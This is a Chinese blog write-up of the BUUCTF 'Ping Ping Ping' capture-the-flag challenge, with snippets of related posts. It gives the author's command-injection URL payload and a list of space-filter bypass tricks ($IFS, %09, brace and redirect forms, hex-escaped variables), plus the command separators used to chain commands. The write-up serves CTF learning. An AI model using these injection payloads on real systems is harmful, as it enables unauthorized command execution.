buuctf:Ping Ping Ping(命令执行)

已于 2022-08-06 17:12:08 修改
阅读量1.2k 收藏 2
点赞数
文章标签: 安全
于 2022-08-06 17:12:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzqzzq11/article/details/126197881
版权

这道题就是很迷,反正需要绕过很多符号,最后用了这个http://d2751aa8-0309-464e-87d6-2829eda800b1.node4.buuoj.cn:81/?ip=127.0.0.1||$a=ag.php;$b=fl;cat$IFS`ls`;
暴出来了。中间最主要的想法就是绕过空格,然后用了$IFS的方法。

$IFS是内部域分隔符,默认是空格、换行符等。可以进行修改,如下图所示:


绕过空格
其实我们可以用一些字符来代替空格,windows系统与linux系统有些差异。
Windows:
type.\flag.txt
type,flag.txt
echo,123456

linux:
{cat,flag.txt} 
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat$IFS$1flag.txt
cat<flag.txt
%09替换
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg
(\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)

这里还要纠正一个误区linux的``反引号,比如`echo cat flag`,这个会执行,得到结果是 cat flag 。这个cat flag如果你在命令行按了下回车,那么肯定就是输出了flag的内容了,而并不是将里面的东西执行两次,这一定要注意!就是把反引号里面的东西执行了作为输出罢了!!


后面测试发现下面这样也可以行。linux中$+数字 比如$1代表传给脚本的第一个参数,如果是在shell中直接执行的话是空。

 

WHU_Joe.
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GXYCTF2019]Ping Ping Ping(命令执行)
mafucan的博客
06-21 662
常见写法127.0.0.1&&+code 只有在 && 左边的命令返回真(命令返回值 $? == 0),&& 右边的命令才 会被执行。 127.0.0.1&+code &表示将任务置于后台执行 127.0.0.1||+code 只有在 || 左边的命令返回假(命令返回值 $? == 1),|| 右边的命令才 会被执行。 127.0.0.1|+code | 表示管道,上一条命令的输出,作为下一条命令的参数 127.0.0.1;+code 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块1、 | 通
BUUCTFPing Ping Ping
金 帛的博客
02-20 6369
BUUCTFWP,关于一些waf的绕过
万万ping一下:ping网址域名工具
08-02
功能简介: 万万ping一下,可以对域名进行批量ping,测试域名连接是否正常,并返回结果到列表。也可以通过指定或输入域名进行单域名ping。 适用于windows7/10 无需安装,打开即用. 帮助说明: 1.功能:ping网址,查看网址是否能ping通,并返回ip地址和发包平均用时; 2.网址列表处输入网址存放的txt文档地址,网址一行一个; 3.支持拖拽网址存放文件到网址列表获取地址; 4.域名导入完成后,点击ping一下开始依次ping; 5.选中或输入单网址到选中域名框中,可以ping单网址; 6.导出功能,导出ping通或未ping通的域名;
[GXYCTF2019]Ping Ping Ping
qq_52907838的博客
04-28 138
打开环境,看到/?ip= 于是随便ping一个IP:127.0.0.1 再试试127.0.0.1|ls 得到flag.php和index.php 接着用127.0.0.1|cat flag.php去获取flag.php 发现不行,则猜测是空格被过滤了 就想想绕过的方法: 1.%09(url传递)(cat%09flag.php) 2.${IFS} 3.$IFS$9 4.<>(cat<>/flag) 5.<(cat</flag) 6.{cat,
CTF_Web_[GXYCTF2019]Ping Ping Ping
十二_的博客
07-26 1652
表示上一条命令执行失败后,才执行下一条命令,如catnofile||echo“fail”表示前一条命令执行成功时,才执行后一条命令,如echo'1‘&&echo‘2’表示管道,上一条命令的输出,作为下一条命令参数,如echo‘yes’|wc-l。发现没有任何新的回显,应该是因为前面是假ping,所以后面的命令执行。如上图,“||”会有效果—显示了两个后缀为“php”的文件名.文件,或许我们要找的flag就在其中。根据大佬解题的思路,我们来找文件,进行测试。...
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2639
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
BUUCTF【Web】Ping Ping Ping
qq_70434663的博客
03-02 721
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
buuctf-Ping Ping Ping
m0_52432374的博客
03-13 487
buuctf-Ping Ping Ping 先尝试?ip=127.0.0.1&ls 发现不行 尝试?ip=127.0.0.1|ls,发现可以
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
计算机网络讲解实验二:Ping命令.pptx
11-13
计算机网络讲解实验二:Ping命令.pptx
pingg:Ping延迟图形化CLI
02-06
Ping延迟图CLI ...--trace -t执行traceroute并绘制ping图到每个目标 --interval 1 -i设置每次ping之间的时间 --flood -f -A尽可能快地ping --color -c要使用的颜色列表。 默认值: green,blue,red,white,y
带参数的ping命令的实现
12-01
环境:在虚拟机上安装,ubuntu内容:里面包含完整的代码实现,可直接运行,包含完整的课设报告。
CTF学习笔记——Include&Ping Ping Ping
Obs_cure的博客
09-20 1510
一、[ACTF2020 新生赛]Include 1.题目 2.解题步骤 点进去看了一下 根据题目猜测,应该是和php的文件包含漏洞有关…尝试了一下显示phpinfo,意料之中的失败了,看wp才了解到,这是一道伪协议的题目。然后翻了一下之前的博客,复制一下payload,成功解题。 ?file=php://filter/convert.base64-encode/resource=flag.php 3.总结 第二次做伪协议的题,只能说经验不足,辨识出来,下次遇见类似这种访问文件的题目时可以尝试。
BUUCTF-Ping Ping Ping
weixin_51383898的博客
10-07 210
启动靶机,页面提示可以传入的参数为ip=尝试ping一下本地IP地址尝试使用拼接符,空格(space)字符被过滤了,不得行删除空格字符获取当前目录有哪些文件,发现有flag.php和index.php尝试直接读取flag.php文件,不可行,忘记空格被过滤了绕过了空格,flag又被过滤了这时候,还有一个index.php源码文件,尝试读取查阅资料可得,preg_match()函数是PHP中用于匹配正则表达式的函数之一。该函数用来,并将结果存储在一个数组中,。
buuctf [GXYCTF2019]Ping Ping Ping
m0_63711447的博客
05-25 1307
1、打开题目环境 2、 先ping一下试试 3、直接cat flag,提示说不能有空格 4、用%09过滤空格,可能是过滤了特殊的字符 5、
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 4962
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
[GXYCTF2019]Ping Ping Ping - RCE(空格、关键字绕过[3种方式])
oZuoShen123的博客
10-11 550
/?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
buuctf web Ping Ping Ping
08-04
根据引用[1]和引用[2]的内容,题目"buuctf web Ping Ping Ping"涉及到多命令执行和绕过空格的问题。根引用[2]中的思路分析,可以使用反引号来绕过空格过滤,并执行ls命令来查询文件名。构造的payload如下:?ip=1;cat...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值